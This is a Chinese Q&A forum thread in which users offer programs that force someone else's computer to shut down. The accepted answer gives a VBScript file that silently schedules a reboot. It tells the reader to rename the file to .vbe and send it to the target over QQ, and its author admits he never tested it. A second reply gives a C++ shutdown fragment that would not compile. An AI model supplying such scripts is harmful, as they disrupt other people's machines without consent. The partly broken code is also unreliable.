0
0
已采纳
张帆
中级天翼
中级天翼
关机一次到是可以,但是关机三次,啊,不行,因为关机一次后会丢失上次程序运行的位置,不过我有这种关机程序。
在桌面新建一个记事本,输入
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c """" ",0 ,true
dim a
do while(a <> "")
a = inputbox (" """" ","","",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + ""
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + ""
另存为一下,将后缀名改为.vbe,将此文件通过QQ发给对方,就OK了。
没试过,其他地方找的。
PS:我没法加你QQ,我妈不给加
张帆在2020-12-20 14:58:46追加了内容
——创新公社
1
0
王博佑
新手守护
新手守护
#include <iostream>
#include<bits/stdc++.h>
#include<windows.h>
system("shutdown -s -f -t 30");
就是这个
0
0
0
0
0
0
0
0
0